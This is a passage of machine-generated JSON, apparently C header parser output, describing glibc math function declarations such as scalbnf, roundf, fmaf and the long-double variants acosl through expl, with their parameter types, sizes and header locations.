"/usr/include/x86_64-linux-gnu/bits/mathcalls.h:272:1 <Spelling=<scratch space>:319:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "scalbnf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:276:1 <Spelling=<scratch space>:320:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__scalbnf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:276:1 <Spelling=<scratch space>:322:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ilogbf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:280:1 <Spelling=<scratch space>:323:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__ilogbf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:280:1 <Spelling=<scratch space>:325:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "scalblnf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:290:1 <Spelling=<scratch space>:327:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__scalblnf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:290:1 <Spelling=<scratch space>:329:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "nearbyintf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:294:1 <Spelling=<scratch space>:330:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__nearbyintf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:294:1 <Spelling=<scratch space>:332:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "roundf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:298:1 <Spelling=<scratch space>:333:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__roundf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:298:1 <Spelling=<scratch space>:335:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "truncf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:302:1 <Spelling=<scratch space>:336:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__truncf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:302:1 <Spelling=<scratch space>:338:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "remquof", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:307:1 <Spelling=<scratch space>:339:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__quo", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__remquof", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:307:1 <Spelling=<scratch space>:3:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__quo", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lrintf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:314:1 <Spelling=<scratch space>:4:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lrintf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:314:1 <Spelling=<scratch space>:6:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "llrintf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:316:1 <Spelling=<scratch space>:7:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__llrintf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:316:1 <Spelling=<scratch space>:9:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "lroundf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:320:1 <Spelling=<scratch space>:10:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lroundf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:320:1 <Spelling=<scratch space>:12:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "llroundf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:322:1 <Spelling=<scratch space>:13:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__llroundf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:322:1 <Spelling=<scratch space>:15:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fdimf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:326:1 <Spelling=<scratch space>:16:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fdimf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:326:1 <Spelling=<scratch space>:18:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fmaxf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:329:1 <Spelling=<scratch space>:19:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fmaxf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:329:1 <Spelling=<scratch space>:21:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fminf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:332:1 <Spelling=<scratch space>:22:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fminf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:332:1 <Spelling=<scratch space>:24:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fmaf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:335:1 <Spelling=<scratch space>:25:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__z", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fmaf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:335:1 <Spelling=<scratch space>:27:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__z", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "scalbf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:396:1 <Spelling=<scratch space>:29:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__scalbf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:396:1 <Spelling=<scratch space>:31:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fpclassifyl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:21:1 <Spelling=<scratch space>:32:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__signbitl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:25:1 <Spelling=<scratch space>:33:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__isinfl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:30:1 <Spelling=<scratch space>:34:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__finitel", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:33:1 <Spelling=<scratch space>:35:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__isnanl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:36:1 <Spelling=<scratch space>:36:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__iseqsigl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:39:1 <Spelling=<scratch space>:37:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__issignalingl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:42:1 <Spelling=<scratch space>:38:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "acosl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:53:1 <Spelling=<scratch space>:39:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__acosl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:53:1 <Spelling=<scratch space>:41:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "asinl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:55:1 <Spelling=<scratch space>:42:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__asinl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:55:1 <Spelling=<scratch space>:44:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "atanl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:57:1 <Spelling=<scratch space>:45:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__atanl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:57:1 <Spelling=<scratch space>:47:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "atan2l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:59:1 <Spelling=<scratch space>:48:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__atan2l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:59:1 <Spelling=<scratch space>:50:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "cosl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:62:1 <Spelling=<scratch space>:53:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__cosl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:62:1 <Spelling=<scratch space>:55:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "sinl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:64:1 <Spelling=<scratch space>:58:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__sinl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:64:1 <Spelling=<scratch space>:60:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "tanl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:66:1 <Spelling=<scratch space>:61:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__tanl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:66:1 <Spelling=<scratch space>:63:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "coshl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:71:1 <Spelling=<scratch space>:64:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__coshl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:71:1 <Spelling=<scratch space>:66:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "sinhl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:73:1 <Spelling=<scratch space>:67:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__sinhl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:73:1 <Spelling=<scratch space>:69:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "tanhl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:75:1 <Spelling=<scratch space>:70:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__tanhl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:75:1 <Spelling=<scratch space>:72:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "acoshl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:85:1 <Spelling=<scratch space>:73:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__acoshl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:85:1 <Spelling=<scratch space>:75:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "asinhl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:87:1 <Spelling=<scratch space>:76:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__asinhl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:87:1 <Spelling=<scratch space>:78:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "atanhl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:89:1 <Spelling=<scratch space>:79:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__atanhl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:89:1 <Spelling=<scratch space>:81:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "expl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:95:1 <Spelling=<scratch space>:84:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__expl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:95:1 <Spelling=<scratch space>:86:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "frexpl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:98:1 <Spelling=<scratch 